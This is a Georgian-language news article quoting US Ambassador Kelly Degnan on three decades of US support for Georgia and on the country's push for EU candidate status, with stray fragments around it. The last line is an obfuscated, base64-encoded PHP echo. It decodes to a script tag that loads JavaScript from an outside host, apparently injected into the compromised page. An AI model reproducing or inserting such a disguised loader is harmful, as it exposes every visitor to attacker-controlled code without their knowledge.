celsiusi
ავერსი შნაიდერი
ყოველთვის გამჭვირვალედ ვაცხადებთ, რატომ ზრუნავს აშშ საქართველოზე და რას აკეთებს საქართველოში. 30 წლის განმავლობაში, იმის მიუხედავად, რომელი ძალა იყო ხელისუფლებაში, ჩვენ ვმუშაობდით, რომ დავხმარებოდით საქართველოს, – ამის შესახებ აშშ-ის ელჩმა კელი დეგნანმა, საქართველოში ამერიკული დაფინანსების შესახებ მოძრაობა „ხალხის ძალის“ განცხადებაზე დასმული კითხვის საპასუხოდ აღნიშნა.
 
მისივე თქმით, აშშ მხარს უჭერდა საქართველოს ძალისხმევას, აეშენებინა დემოკრატიული ინსტიტუტები, რაც აუცილებელია, რომ საქართველო ევროკავშირსა და ნატო-ში გაწევრიანდეს. ელჩის შეფასებით, საქართველოს პარლამენტის წევრები და პოლიტიკური ლიდერები მაქსიმალურად უნდა ფოკუსირდნენ იმაზე, რომ მიღწეულ იქნას ევროკავშირის კანდიდატის სტატუსი ამ ქვეყნისთვის.
 
„ჩვენ ყოველთვის ცხადად, თანმიმდევრულად და გამჭვირვალედ ვაცხადებთ, რატომ ზრუნავს აშშ საქართველოზე და რას აკეთებს აშშ საქართველოში. 30 წლის განმავლობაში, იმის მიუხედავად, რომელი ძალა იყო ხელისუფლებაში, ჩვენ ვმუშაობდით, რომ დავხმარებოდით საქართველოს, რათა ყოფილიყო უფრო უსაფრთხოდ, უფრო მომზადებული საქართველოს საზღვრების დასაცავად, რომ ყოფილიყო ეკონომიკა უფრო დივერსიფიცირებული და განვითარებული, ყოფილიყო მეტი სამუშაო ადგილი, განვითარებულიყო განათლების სისტემა, განვითარებულიყო ჯანდაცვის სისტემა, ასევე, ვეხმარებოდით საქართველოს, რომ გაეგრძელებინა დემოკრატიული ინსტიტუტების განვითარება, რომელიც დაიწყო ასი წლის წინ, ვიდრე რუსეთი შემოიჭრებოდა. საქართველო უკვე იყო ძლიან პროგრესული დემოკრატია 1918 წელს და ახლა თქვენ ამ სამუშაოს ისევ სწევთ.
 
აშშ მხარს უჭერდა საქართველოს ძალისხმევას, რომ აეშენებინა დემოკრატიული ინსტიტუტები, არა მხოლოდ იმიტომ, რომ ეს საქართველოს უმრავლესობას სურს, არამედ იმიტომ, რომ ეს აუცილებელია, რათა საქართველო ევროკავშირსა და ნატო-ში გაწევრიანდეს, რაც ასევე სურს საქართველოს დიდ უმრავლესობას. საქართველოს პარლამენტის წევრების და პოლიტიკური ლიდერების მაქსიმალური ფოკუსირება უნდა მოხდეს, რომ მიღწეულ იქნას ევროკავშირის კანდიდატის სტატუსი ამ ქვეყნისთვის.
 
საქართველომ ბევრი რამ გააკეთა და შეასრულა ასოცირების, თავისუფალი ვაჭრობის, უვიზო მიმოსვლის შეთანხმებაში. შემდეგი მნიშვნელოვანი ნაბიჯი თქვენ ხელშია, მაგრამ საქართველოს ლიდერებმა ასპროცენტიანი ფოკუსირება უნდა მოახდინონ ამის მისაღწევად საქართველოს მოსახლეობისთვის, რადგან სწორედ ეს სურს საქართველოს მოსახლეობას. აშშ ფოკუსირებულია, დაეხმაროს საქართველოს, მიაღწიოს ამას“, – განაცხადა კელი დეგნანმა.A
416
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");